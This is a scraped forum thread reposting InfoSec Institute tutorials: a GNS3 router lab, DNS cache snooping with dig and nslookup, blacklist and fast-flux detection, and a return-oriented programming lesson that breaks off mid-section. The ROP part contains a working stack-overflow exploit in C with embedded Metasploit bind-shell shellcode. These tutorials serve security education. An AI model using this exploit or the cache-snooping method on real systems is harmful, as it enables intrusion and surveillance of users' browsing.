192.168.2.2 and XP2 IP address should be 192.168.3.2. GNS3 Installation My host machine is Windows 7, so I’m gonna download the all-in-one version from SourceForge here. Double click on the all-in-one installer, and install with all default options. Keep clicking ‘Next’ until install is finished, as we mentioned in the Windows installation part earlier. Now open GNS3 from Desktop. To start working with GNS3, you must have CISCO IOS, so press CTRL+SHIFT+I , you will get a box called “IOS images and hypervisors”. So now we have to enter the path of the CISCO IOS file, and you should make sure that the platform and model is appropriate to the images file you have selected. Now we have to start a new project, so press CTRL+N, then put in the project path to store your project there, and make sure you have checked “Save nvrams and other disk files” and “Export router configuration files”. So now we are gonna drag the router C3600 icon from the left panel to the work space. Now the router has been configured, then right click on the router R1 and click on configure and go to slot option and add two NM-1FE-TX in slot0 and slot1 (here we add two Fast Ethernet cards) and click on OK. It’s time to start the router, so right click on the router and click start, then right click on the router and click on console to start the telnet session to configure the router. Now choose the IDLE PC value by right clicking on the router and clicking on IDLE PC. Select the value which is marked with *. By doing this the processor utilization is very much reduced. Now it’s time to create another router, C3600, and add two fast ethernet interfaces. Right click on the router and click start, then another right click on the router and click console. We will configure our routers later. Of course we can rename our routers by right clicking and choosing “change the host name”. Connecting Virtual Machines to the Routers Now we will connect our virtual machines running on VMware to our routers like our topology.We will connect XP1 with Router 1 and XP2 with Router2. We will connect our virtual machine as a cloud. To do that we must follow these steps: 1- Drag the cloud, present on the left nodes panel, to our workspace. 2- Right click on the cloud and click on configure. 3- In the ‘Generic Ethernet NIO’, select the appropriate VMnet to be connected and click on ADD and click on OK. In the third step we will add VMnet 2 with XP1 and VMnet 3 with XP2. Now we will make the same thing for XP2 by adding VMnet 3 to it. Router Configuration The configuration we will write in Router 1 are the same as with router 2, but with some differences. To configure the interfaces : 1- open the console of the router 2- enter the enable mode and write “config terminal” 3- To configure IP addresses of interfaces, write the following commands. Write this configuration for each interface (you should take care for router interfaces and IP addresses of each interface). Router(config)# int fa 0/0 Router(config-if)# ip add 192.168.2.3 255.255.255.0 Router(config-if)# no shut 4- To configure the routing protocol, we will use RIP V2, but you should take care because the network command IP addresses differ according to your topology for each router. Router(config)#router rip Router(config)#version 2 Router(config-router)#network 192.168.2.0 Router(config-router)#network 192.168.4.0 You should do the same configuration for the other router, and finally you should be able to ping from XP1 to XP2. Congrats, you have a working topology for any type of testing. Sursa InfoSec Institute Resources
-
http://www.youtube.com/watch?v=Cgt5CiuZAGY&feature=g-u-u
-
1. Introduction DNS or name servers are servers that resolve a hostname to their IP representation. There are numerous DNS servers out there, all of which resolve specific domains, but each of them stores specific DNS records. Those records can be the following: A, AAAA, NS, MX, etc. All of the DNS servers are connected together to form a hierarchical DNS network. Let’s query our own local DNS server to resolve a hostname www.google.com: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19[/TD] [TD=class: code]# nslookup Google 192.168.1.1 Server: 192.168.1.1 Address 1: 192.168.1.1 Name: Google Address 1: 173.194.35.148 muc03s01-in-f20.1e100.net Address 2: 173.194.35.144 muc03s01-in-f16.1e100.net Address 3: 173.194.35.147 muc03s01-in-f19.1e100.net Address 4: 173.194.35.145 muc03s01-in-f17.1e100.net Address 5: 173.194.35.146 muc03s01-in-f18.1e100.net Address 6: 2a00:1450:4016:800::1010 muc03s01-in-x10.1e100.net[/TD] [/TR] [/TABLE] We can see that the query returned five addresses: 173.194.35.144, 173.194.35.145, 173.194.35.146, 173.194.35.147 and 173.194.35.148, which are used for load balancing. 2. DNS Queries The primarily job of a DNS server is to respond to DNS queries. A DNS query is a question such as: “Hello DNS server, please tell me the IP of a host www.google.com”. Whenever a DNS server receives such a query, it has to look up the IP of the domain and return the corresponding IP address. A DNS server can look up the information about the hostname’s address in local cache. If the hostname-IP combination is present, it can immediately return the result. Otherwise it has to send the query forward to its DNS server, asking it for an IP of www.google.com. That DNS server does the same thing. The purpose of a DNS server is to provide a hostname-to-IP translation for local domains that are configured in local zone files. But those are not the most common requests the DNS server will have to resolve; the most common requests are those that the DNS server has no knowledge of. When such a query is received a DNS server can execute one of the following queries: 1. Recursive Query: Since the DNS server doesn’t have any knowledge about the hostname in the query, it will ask its own DNS server to resolve it. The recursive query thus always returns the IP address of the hostname if such an IP exists. Recursive queries are not required to be supported by DNS servers. 2. Iterative Non-Recursive Query: If the DNS server doesn’t have any knowledge about the hostname in the query, it returns a list of DNS servers, which might have such information. But if the hostname-IP pair is in the local cache, the corresponding IP is returned. Non-recursive queries must be supported by all DNS servers. 3. DNS Cache Snooping: Non-Recursive Queries are Enabled DNS cache snooping is a process of figuring out the already resolved queries by the DNS server. This can be useful if we want to check the hostnames that the local network (the one using the DNS name server) already resolved. This means that nodes on the local network using that DNS server requested specific hostnames in the near past, which can be used to snoop what web pages the users are visiting at any give time. A DNS server is susceptible to DNS cache snooping if we can make a non-recursive query to a DNS server looking for already resolved hostnames. To check whether a DNS server is susceptible to DNS snooping we can try to find the IP address of a hostname by querying DNS server non-recursively; by not asking further DNS servers for an answer if the DNS server did not know it. We can do that with a nslookup command: [TABLE] [TR] [TD=class: gutter]1[/TD] [TD=class: code]# nslookup -norecursive <a href="Vulnerability Management and Penetration Testing | Rapid7">www.rapid7.com</a>[/TD] [/TR] [/TABLE] First, we try to use nslookup command to ask the DNS server 8.8.8.8 (Google DNS server) to resolve the hostname www.rapid7.com non-recursively with the use of the -norecursive option. In the output below, we can see that the nslookup command doesn’t reveal the IP address of www.rapid7.com: [TABLE] [TR] [TD=class: gutter]1 2 3 4 5 6 7 8 9[/TD] [TD=class: code]# nslookup -norecursive -type=A Vulnerability Management and Penetration Testing | Rapid7 Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: *** Can't find Vulnerability Management and Penetration Testing | Rapid7 No answer[/TD] [/TR] [/TABLE] Afterward, we can use the -recursive option, which should reveal the IP address as can be seen below: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11[/TD] [TD=class: code]# nslookup -recursive -type=A Vulnerability Management and Penetration Testing | Rapid7 Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: Name: Vulnerability Management and Penetration Testing | Rapid7 Address: 208.118.227.10[/TD] [/TR] [/TABLE] We can see that the DNS server 8.8.8.8 recursively asked other DNS servers for the information about the hostname www.rapid7.com. At the end of the query, it returns an address 208.118.227.10, which is an IP address of the hostname Vulnerability Management and Penetration Testing | Rapid7. Then we can again use the -norecursive option, which should now reveal the IP address. The reason for this is that when -recursive was used, the DNS server stored the returned IP address with a hostname in its cache. And then it can return the result even with non-recursive search as long as the entry exists in the cache (the result can be returned without recursively searching). We can see the output of a non-recursive query below: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11[/TD] [TD=class: code]# nslookup -norecursive -type=A Vulnerability Management and Penetration Testing | Rapid7 Server: 8.8.8.8 Address: 8.8.8.8#53 Non-authoritative answer: Name: Vulnerability Management and Penetration Testing | Rapid7 Address: 208.118.227.10[/TD] [/TR] [/TABLE] Now the non-recursive query returned an IP 208.118.227.10. We saw how to figure out if a DNS server is vulnerable to DNS cache snooping. 3. DNS Cache Snooping: Non-Recursive Queries are Disabled To snoop a DNS server we can use non-recursive queries, where we’re asking the cache to return a given resource of any type: A, MX, CNAME, PTR, etc. We can do this by setting the recursion desired (RD flag) in query to 0. If the entry exists in the DNS cache, it will be returned. Otherwise the DNS server will reply with information about other servers that can better answer the query; in most cases we’ll receive the root.hints file back. Usually, this can be disabled when configuring the DNS server by disabling the non-recursive queries. But even if only recursive queries are allowed, we can sometimes still detect whether a certain entry was taken from a cache or not. There are two techniques for doing that: a. By checking the time the query takes to process. If the query time is approximately equal to the time it takes to send packets to the server, then the entry might have been already been present in the cache, since it didn’t spend any time querying other DNS servers. We can check this by first using the ping tool to measure the RTT (round trip time) of a few ICMP packets being sent to the specific nameserver. The next example sends three ICMP packets to a DNS server 8.8.8.8, which takes approximately 30.387 milliseconds (check the avg measurement of the last line of the output below): [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15[/TD] [TD=class: code]# ping -c 3 8.8.8.8 PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data. 64 bytes from 8.8.8.8: icmp_req=1 ttl=47 time=29.7 ms 64 bytes from 8.8.8.8: icmp_req=2 ttl=47 time=30.7 ms 64 bytes from 8.8.8.8: icmp_req=3 ttl=47 time=30.6 ms --- 8.8.8.8 ping statistics --- 3 packets transmitted, 3 received, 0% packet loss, time 2003ms rtt min/avg/max/mdev = 29.725/30.387/30.769/0.491 ms[/TD] [/TR] [/TABLE] Then we need to try to request some hostname using the DNS nameserver 8.8.8.8, but with a tool that also displays the time it took to execute the query. Such a tool is dig. The example below sends a DNS query for www.google.com to the DNS server 8.8.8.8, which took 31 milliseconds: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39[/TD] [TD=class: code]# dig @8.8.8.8 Google ; <<>> DiG 9.9.1-P2 <<>> @8.8.8.8 Google ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 39294 ;; flags: qr rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 512 ;; QUESTION SECTION: ;Google. IN A ;; ANSWER SECTION: Google. 256 IN A 173.194.35.146 Google. 256 IN A 173.194.35.144 Google. 256 IN A 173.194.35.145 Google. 256 IN A 173.194.35.147 Google. 256 IN A 173.194.35.148 ;; Query time: 31 msec ;; SERVER: 8.8.8.8#53(8.8.8.8) ;; MSG SIZE rcvd: 123[/TD] [/TR] [/TABLE] The time taken to send an ICMP packet to the nameserver and receive a response took about 30 milliseconds, while the DNS query took 31 milliseconds. The time measurements are very close, so the entry www.google.com was probably in the cache of the DNS nameserver 8.8.8.8. Let’s try to resolve a hostname www.imdb.com, which as we’ll see is not in a local cache: ? [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33[/TD] [TD=class: code]# dig @8.8.8.8 IMDb - Movies, TV and Celebrities ; <<>> DiG 9.9.1-P2 <<>> @8.8.8.8 IMDb - Movies, TV and Celebrities ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 28806 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 512 ;; QUESTION SECTION: ;IMDb - Movies, TV and Celebrities. IN A ;; ANSWER SECTION: IMDb - Movies, TV and Celebrities. 9410 IN CNAME us.dd.imdb.com. us.dd.imdb.com. 33 IN A 207.171.162.180 ;; Query time: 61 msec ;; SERVER: 8.8.8.8#53(8.8.8.8) ;; MSG SIZE rcvd: 77[/TD] [/TR] [/TABLE] The time taken to complete this query was 61 milliseconds, which means that the time taken to complete the query has doubled. This is a reasonable indication that the hostname www.imdb.com was not in a local cache. If we try to request the same hostname again, we can see that the time now is only 31 milliseconds (the same as before), which is probably because of the fact that the hostname-IP pair was put in a local cache by a previous request: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33[/TD] [TD=class: code]# dig @8.8.8.8 IMDb - Movies, TV and Celebrities ; <<>> DiG 9.9.1-P2 <<>> @8.8.8.8 IMDb - Movies, TV and Celebrities ; (1 server found) ;; global options: +cmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 53647 ;; flags: qr rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1 ;; OPT PSEUDOSECTION: ; EDNS: version: 0, flags:; udp: 512 ;; QUESTION SECTION: ;IMDb - Movies, TV and Celebrities. IN A ;; ANSWER SECTION: IMDb - Movies, TV and Celebrities. 10776 IN CNAME us.dd.imdb.com. us.dd.imdb.com. 36 IN A 72.21.203.211 ;; Query time: 31 msec ;; SERVER: 8.8.8.8#53(8.8.8.8) ;; MSG SIZE rcvd: 77[/TD] [/TR] [/TABLE] b. By checking the TTL when querying a vulnerable DNS server as opposed to another root DNS server. Because the non-recursive queries are not allowed, the only option is to use recursive queries that will be put in the cache on the DNS nameserver. But even if that is the case, we can figure out whether the hostname was previously in the cache or not. To do that, we can check the TTL value of the response, which should be considerably low if the entry was previously stored in the cache. We can check the TTL value by executing the command below: [TABLE] [TR] [TD=class: gutter]01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71[/TD] [TD=class: code]# nslookup -type=A Google 8.8.8.8 -debug Server: 8.8.8.8 Address: 8.8.8.8#53 ------------ QUESTIONS: Google, type = A, class = IN ANSWERS: -> Google internet address = 173.194.35.146 ttl = 300 -> Google internet address = 173.194.35.148 ttl = 300 -> Google internet address = 173.194.35.144 ttl = 300 -> Google internet address = 173.194.35.145 ttl = 300 -> Google internet address = 173.194.35.147 ttl = 300 AUTHORITY RECORDS: ADDITIONAL RECORDS: ------------ Non-authoritative answer: Name: Google Address: 173.194.35.146 Name: Google Address: 173.194.35.148 Name: Google Address: 173.194.35.144 Name: Google Address: 173.194.35.145 Name: Google Address: 173.194.35.147[/TD] [/TR] [/TABLE] In the output above, the TTL value is 300, which is considerably low number. That probably indicates that the hostname www.google.com was already in the cache when query was made. 4. Conclusion We’ve seen how to check whether the hostnames have recently been resolved by the specific DNS nameserver, which can be used to check out what hostnames the users of that nameserver were recently using. Sursa InfoSec Institute Resources
-
1. Blacklists Several web pages that maintain blacklists exist these days. These web pages maintain IP addresses and domains that are believed to be malicious, but the problem is that there are quite a lot of those pages and we don’t have the time to check them all. Fortunately, several web pages exist that send queries to all the other maintained web pages that contain the blacklists and present the results on the united web page. An example of such a web page is the Anti-Abuse Project, which automatically checks IP addresses and domains against different blacklists. If we visit the web page of the Anti-Abuse Project that is located on the address The Anti-Abuse Project | RBL check and monitoring | Network Security Consulting, we will be presented with a web page as shown below: At the top of the web page we can see two links. The first is for Multi-RBL Check, which will scan the IP address of the domain against the real-time blacklists, and the second link is the RBLmon web page that monitors the IP address or domain in real time and notifies us as soon as the entered IP address or domain appears on at least one of the blacklists. 1.1 Multi-RBL Check The Multi-RBL Check web site looks like this: We must enter the IP address or domain into the input field, in our case 66.7.209.205, and click on Check. Upon completion, multiple blacklists are scanned and the results are shown below: In the picture above only a few of the blacklists are shown because there are just too many of them to present them all in one picture. We can see that the IP address 66.7.209.205 is not listed on any of the blacklists presented. If the IP was listed in one of the blacklists, the square would have been red instead of green. 1.2 RBLmon The RBLmon is an automated online service that allows us to monitor an IP address of a domain against the various blacklists in real-time and send an email as soon as the IP address or domain appears as blocked in any of the blacklists. The web page looks like this: We need to register an account. Upon doing that and logging into the RBLmon, we’re presented with a user interface as seen below: We can see that we haven’t configured any IP addresses just yet. Let’s add a new IP address 66.7.209.205 (infosecresources.com). We can freely add up to three addresses, but if we want to monitor more IP addresses we have to pay for their service. If we use a free account, the frequency of checking whether the IP addresses are blacklisted is once per two days, whereas otherwise it’s one a day. We can see different membership packages here: Once we’ve set-up our IP addresses we would like to monitor, everything should be working fine. The RBLmon should check the IP address against blacklists once every 2 days and we should receive an email about our IP being blacklisted. If the IP address wasn’t blacklisted in any of the blacklists we’ll receive an email like below: 2. Fast Flux Domains Fast Flux domains are used to make malware more resilient. The ideas is that one single domain has multiple IP addresses associated with it. When a query against the domain name is made, a different IP is returned each time (thus the IPs are changed in a round-robin fashion). If one server is taken down by the government, the other IPs are still operational and the malware can still operate successfully without downtime. The servers that were taken down will be replaced by new servers by the attackers who wrote the malware. A round-robin DNS technique is used for this to work. The round-robin technique is usually used for load distribution, load balancing or fault-tolerance, but in fast flux domains multiple nodes are registering and de-registering their addresses as part of the DNS round-robin IP addresses. This combines a round-robin DNS with very short time to live values, which forces that DNS resolves to a different IP every 5 minutes or so. We can’t block or take down IP addresses associated with fast flux domains, because there is normally too many nodes and we can’t take them all down. A better way to fight against those fast flux domains is to take down the domain itself, because there is normally just one domain. The fast flux domains can be identified with the host command where we query a specific domain for IP addresses that it uses. In case there are multiple IP addresses returned, the likelihood of a malicious fast flux domain increases. But multiple IP addresses don’t necessarily mean we’re dealing with a fast flux domain. A good example of this is Google, which uses the same domain for load balancing. Let’s present the results of running the host command on a google.com domain: [TABLE] [TR] [TD=class: code]$ host google.com google.com has address 173.194.39.72 google.com has address 173.194.39.69 google.com has address 173.194.39.70 google.com has address 173.194.39.64 google.com has address 173.194.39.66 google.com has address 173.194.39.67 google.com has address 173.194.39.68 google.com has address 173.194.39.73 google.com has address 173.194.39.78 google.com has address 173.194.39.65 google.com has address 173.194.39.71[/TD] [/TR] [/TABLE] There are multiple IP addresses tied to the same domain, but in the case of Google, we can be pretty sure the domain isn’t malicious . If we query the same domain again a couple of moments later, we can see that the order of IP addresses has changed: [TABLE] [TR] [TD=class: code]$ host google.com google.com has address 173.194.39.71 google.com has address 173.194.39.65 google.com has address 173.194.39.78 google.com has address 173.194.39.73 google.com has address 173.194.39.68 google.com has address 173.194.39.67 google.com has address 173.194.39.66 google.com has address 173.194.39.64 google.com has address 173.194.39.70 google.com has address 173.194.39.69 google.com has address 173.194.39.72[/TD] [/TR] [/TABLE] The IP address 173.194.39.72 is now listed as last and before it was first; it looks like the IP addresses are part of the round-robin DNS load balancing. In the case of malicious domains, the round-robin DNS load balancing ensures that the bad IP addresses won’t always be returned first. When a single node is taken down, a single IP address is unreachable, because the server doesn’t exist anymore. In such cases the IP address will still be returned, but won’t be accessible over the Internet. Usually, such nodes will be replaced by good new nodes corresponding to the new IP address and the old non-valid IP address will be removed from DNS load-balancing and a new valid IP address will be added. To ensure that the domain is actually a fast flux domain, we need to query the domain for IP addresses with the host command several times at different time intervals and check whether the returned IP addresses are the same (never mind the order of them). If they are not the same, we can be pretty sure we’re dealing with a fast flux domain, since the IP addresses of the fast flux domains change frequently over time. We can also detect fast flux domains because the returned TTL value is usually 0, which means that the DNS servers will not cache the returned IP address, but will always send a new request when a query to resolve that domain into an IP address is sent. This allows the attackers to frequently update the IP addresses of the domain in question with non-stale information being stored on the Internet. We can get the time to live value of the domain with the dig command as follows: [TABLE] [TR] [TD=class: code]# dig infosecresources.com | grep -A 1 "ANSWER SECTION" ;; ANSWER SECTION: infosecresources.com. 13266 IN A 66.7.209.205[/TD] [/TR] [/TABLE] The TTL value in the case above is 13266 seconds, which is approximately 3 hours. If we execute the same query on the domain google.com we get the results below: [TABLE] [TR] [TD=class: code]# dig google.com | grep -A 1 "ANSWER SECTION" ;; ANSWER SECTION: google.com. 277 IN A 173.194.39.72[/TD] [/TR] [/TABLE] The TTL value is 277 seconds, which is approximately 4 minutes. The TTL value in this case is considerably lower because of the DNS load balancing. This prevents the DNS servers from caching the value for a longer period of time. But if we would execute the above query on a fast flux domain, we would probably receive a TTL value 0, which means that DNS servers shouldn’t cache the IP address; this effectively forces the DNS resolution mechanism to ask for a new IP address every time and not return a stale cached (possibly taken down) IP address that would no longer work. 3. GeoIP It’s always a good idea to know the location of the IP address. We can install the GeoIP package right from our repository. On Linux we can do that by executing the following command: [TABLE] [TR] [TD=class: code]# easy_install pygeoip[/TD] [/TR] [/TABLE] Once installed, we can simply run Python interpreter and import the pygeoip library to have access to the geographical information about the IP address. But we also need GeoIP.dat or GeoLiteCity.dat database. We can download one from the maxmind web site as follows: [TABLE] [TR] [TD=class: code]# wget <a href="http://www.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz">http://www.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz</a> # gunzip GeoLiteCity.dat.gz[/TD] [/TR] [/TABLE] Afterward we can run python interpreter, import the pygeoip library and feed it the IP address of the domain, upon which it will return the geographical information. We can see that below: [TABLE] [TR] [TD=class: code]>>> import pygeoip >>> ip = pygeoip.GeoIP('GeoLiteCity.dat') >>> ip.record_by_name('infosecinstitite.com') {'city': u'Burlington', 'region_name': u'MA', 'area_code': 781, 'time_zone': 'America/New_York', 'longitude': -71.2047, 'metro_code': 'Boston, MA', 'country_code3': 'USA', 'latitude': 42.5051, 'postal_code': u'01803', 'dma_code': 506, 'country_code': 'US', 'country_name': 'United States'}[/TD] [/TR] [/TABLE] We can see that we’ve gotten quite a lot of information, such as the city, the region, the latitude and longitude, etc. 3. Conclusion We’ve seen how to identify if an IP address or domain name was blacklisted, which we can use to identify if we’ve been infected by some kind of malware. There are other better ways of doing that, but nevertheless this is one option of identifying if we’re been infected. Usually it’s too late for blocking the attack, but at least we know our network has been compromised and we can do something about it. We’ve also seen what are fast flux domains and how to identify them. Sursa InfoSec Institute Resources
-
According to Wikipedia, “Return-oriented programming (also called “chunk-borrowing à la Krahmer”) is a computer security exploit technique in which the attacker uses control of the call stack to indirectly execute cherry-picked machine instructions or groups of machine instructions immediately prior to the return instruction in subroutines within the existing program code, in a way similar to the execution of a threaded code interpreter. “Because all the instructions that are executed are from executable memory areas within the original program, this avoids the need for direct code injection, and circumvents most measures that try to prevent the execution of instructions from user-controlled memory.” Let start with an introduction to stack buffer overflows. Basic System Set 1: Windows XP SP2 installed on a machine supporting H/W enabled DEP. 2: Immunity Debugger and Metasploit. 3: TCC compiler or lcc-win compiler. 4: Latest Python installer. 5: Vulnserver(The Grey Corner: Introducing Vulnserver ) by Stephen Bradshaw. 6: Some patience. Stack Buffer Overflows There is a memory region called a “stack”. The stack region of the memory is used to temporarily store data related to the current thread or function, for example the local function and stack parameter of the function. Certain processor registers keep track of the stack location i.e stack top and stack base. These are nothing but memory addresses which determine the address of the stack frame. Two processor registers ESP and EBP are used to track the record of memory address. ESP stand for top stack pointer and EBP for base pointer. This is the typical stack layout in the x86 processor. One thing to notice here is that the stack grows from top to bottom, i.e ESP will always be less or equal to EBP. The stack contains local function variables and a special value called a return address, to which the control flow is returned when a function exits. If that particular value on the stack gets overwritten by any means, we can divert the control flow to our shell code that we injected though data input into the program. For example, consider the following C Code: [FONT=Courier New]int VulnFunction(char *p) [/FONT] [FONT=Courier New]{ [/FONT] [FONT=Courier New] char buf[40]; [/FONT] [FONT=Courier New] strcpy(buf, p); [/FONT] [FONT=Courier New] return 0; [/FONT] [FONT=Courier New]}[/FONT] An equivalent disassembly of the VulnFunction code would be: VulnFunction: [FONT=Courier New] PUSH EBP [/FONT] [FONT=Courier New] MOV EBP,ESP [/FONT] [FONT=Courier New] SUB ESP, 28 ; RESERVER 40 BYTES ON STACK FOR [/FONT] [FONT=Courier New] [/FONT] [FONT=Courier New] PUSH [EBP + 28]; address of buf [/FONT] [FONT=Courier New] CALL strcpy ; vulnerable function [/FONT] [FONT=Courier New] ADD ESP, 4 ; STACK CLEAREANCE [/FONT] [FONT=Courier New] ADD ESP, 28; REMOVER BUF FROM [/FONT] [FONT=Courier New]STACK [/FONT] [FONT=Courier New] POP EBP ; RESTORE OLD EBP [/FONT] [FONT=Courier New] RET ; POP VALUE FROM STACK AND RETURN TO THAT ADDRESSS[/FONT] Now if more than 44 bytes are provided to the function, we will be able to overwrite the return address stored on that stack, which is used to control the return of that function code. Why 44? You may wonder why more than 44 bytes are required to overwrite the return address when the buffer is only 40 bytes. It’s because at the function entry sequence, the EBP (4 bytes) is pushed on to the stack and recovered at the function exit sequence. Let’s now experiment by passing 48 bytes to the program “aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb” and see what happens. In the picture you can clearly see that the EIP gets overwritten by the last 4 bytes, ie “bbbb” (hex 62), and the program crashes suddenly after RET instruction is executed. In conventional attack scenarios we would attack the program by passing junk(44 bytes) + ESP + shellcode. But the problem with that is the address of the ESP always contains some zero bytes e.g. 0012ff4c, strcpy would stop if a null is encountered and will result in incomplete copying of our shell code. We will supply the return address of a special instruction called a trampoline JMP ESP to make it jump to our shell code located on the stack. In the context of our program we will use a trampoline located in ntdll at: 7C941EED JMP ESP So now the attack buffer would be something like this:junk(44 bytes) + JMP_ESP + shellcode We will supply it a TCP bind Shell code generated with from metasploit /* C program to exploit VulnFunction */ [FONT=Courier New]#include <stdio.h> #include <stdlib.h> #include <windows.h>[/FONT] #define JMP_ESP 0x7C941EED // ntdll.dll JMP ESP // metasploit tcp_bin port 4444 unsigned char buf[] = “\x33\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e” “\xd7\x6e\xeb\x09\x83\xee\xfc\xe2\xf4\x2b\x86\x62\x09\xd7\x6e” “\x8b\x80\x32\x5f\x39\x6d\x5c\x3c\xdb\x82\x85\x62\x60\x5b\xc3? “\xe5\x99\x21\xd8\xd9\xa1\x2f\xe6\x91\xda\xc9\x7b\x52\x8a\x75? “\xd5\x42\xcb\xc8\x18\x63\xea\xce\x35\x9e\xb9\x5e\x5c\x3c\xfb” “\x82\x95\x52\xea\xd9\x5c\x2e\x93\x8c\x17\x1a\xa1\x08\x07\x3e” “\x60\x41\xcf\xe5\xb3\x29\xd6\xbd\x08\x35\x9e\xe5\xdf\x82\xd6? “\xb8\xda\xf6\xe6\xae\x47\xc8\x18\x63\xea\xce\xef\x8e\x9e\xfd” “\xd4\x13\x13\x32\xaa\x4a\x9e\xeb\x8f\xe5\xb3\x2d\xd6\xbd\x8d” “\x82\xdb\x25\x60\x51\xcb\x6f\x38\x82\xd3\xe5\xea\xd9\x5e\x2a” “\xcf\x2d\x8c\x35\x8a\x50\x8d\x3f\x14\xe9\x8f\x31\xb1\x82\xc5? “\x85\x6d\x54\xbf\x5d\xd9\x09\xd7\x06\x9c\x7a\xe5\x31\xbf\x61? “\x9b\x19\xcd\x0e\x28\xbb\x53\x99\xd6\x6e\xeb\x20\x13\x3a\xbb” “\x61\xfe\xee\x80\x09\x28\xbb\xbb\x59\x87\x3e\xab\x59\x97\x3e” “\x83\xe3\xd8\xb1\x0b\xf6\x02\xe7\x2c\x38\x0c\x3d\x83\x0b\xd7? “\x7f\xb7\x80\x31\x04\xfb\x5f\x80\x06\x29\xd2\xe0\x09\x14\xdc” “\x84\x39\x83\xbe\x3e\x56\x14\xf6\x02\x3d\xb8\x5e\xbf\x1a\x07? “\x32\x36\x91\x3e\x5e\x5e\xa9\x83\x7c\xb9\x23\x8a\xf6\x02\x06? “\x88\x64\xb3\x6e\x62\xea\x80\x39\xbc\x38\x21\x04\xf9\x50\x81? “\x8c\x16\x6f\x10\x2a\xcf\x35\xd6\x6f\x66\x4d\xf3\x7e\x2d\x09? “\x93\x3a\xbb\x5f\x81\x38\xad\x5f\x99\x38\xbd\x5a\x81\x06\x92? “\xc5\xe8\xe8\x14\xdc\x5e\x8e\xa5\x5f\x91\x91\xdb\x61\xdf\xe9? “\xf6\x69\x28\xbb\x50\xf9\x62\xcc\xbd\x61\x71\xfb\x56\x94\x28? “\xbb\xd7\x0f\xab\x64\x6b\xf2\x37\x1b\xee\xb2\x90\x7d\x99\x66? “\xbd\x6e\xb8\xf6\x02\x6e\xeb\x09?; char *p = NULL; char *Parg = NULL; int VulnFunction(char *p) { char buf[40]; strcpy(buf, p); return 0; } int main(int argc, char **argv) { char a[900]; // junk to compensate stack char *base = NULL; p = (int*) malloc( sizeof(buf) + 48); base = p; if (p == NULL ) exit(EXIT_FAILURE); memset(p, 0×44, 44); // Set 44 Bytes Junk p = p + 44; *(int*)p = JMP_ESP; p = base; memcpy((p + 48), buf, sizeof(buf)); VulnFunction(p); return 0; } After executing we will get a shell at 4444 TCP port. DEP (Data Execution Prevention) DEP is a technique that was introduced to Windows XP SP2 to protect against buffer overflow attacks. DEP simply restricts the execution memory marked as read/write. Since the stack has been marked with read/write attributes, DEP restricts the execution of our shell code which we place on the stack. Ret2lib (Return To Library) Attack Rather than injecting the shellcode and jumping to it, we can call a certain sub-routine in the address space of the executable. For example, we can fake the stack frame to call the system() C standard library function in msvcrt.dll to execute an arbitrary command and we can even chain multiple functions together. That way we can bypass DEP by reusing code from the program binary. But one of the main disadvantage of ret2lib is that it lacks in arbitrary computation (truing completeness). ROP (Return Oriented Proragmming ) Attack This type of attack was introduced by Hovav Shacham of Stanford University in his paper “The Geometry of Innocent Flesh on the Bone:Return-into-libc without Function Calls (on the x86).” In the paper he describes “new return-into-libc techniques that allow arbitrary computation (and that are not, therefore, straight-line limited) and that do not require calling any functions whatsoever“. That means this type of attack is able to perform arbitrary computation without the necessary use of library functions by reusing code chunks which he calls GADGETS. Gadgets are a small group of instructions ending with a x86 RET instruction. For example, mov eax, 10 ; ret is a gadget which allows us to set eax to 10 (decimal). These gadgets can be chained together to make them work as a simple unit to perform arbitray computations. For example, we can chain three gadgets together to perform addition on them: [I] pop eax; ret [/I] [I] pop ebx ret; [/I] [I] add eax, ebx; ret[/I] The following chain of gadgets allows us to set two processor registers and them perform arithmetic addition on them: ROP is not limited to only calculations. We can also perform code branching and check for conditions (equal, less and greater ) on the given data. ROP Attacks (Loading and Storing Data) There are certain gadgets that allows us to store and load data from one place to another. Modes of transfer include: 1: register to register 2: register to memory 3:memory to register Register to Register The gadgets related to reg to reg copying are: [I]mov eax, ebx [/I] [I]mov ecx, eax [/I] etc. Register to Memory A search in Immunity Debugger will yield the following results and even more: [FONT=Courier New][I]7C828B39 MOV ECX,DWORD PTR DS:[ECX] C:\WINDOWS\system32\kernel32.dll [/I][/FONT] [FONT=Courier New][I]7C828BF9 MOV 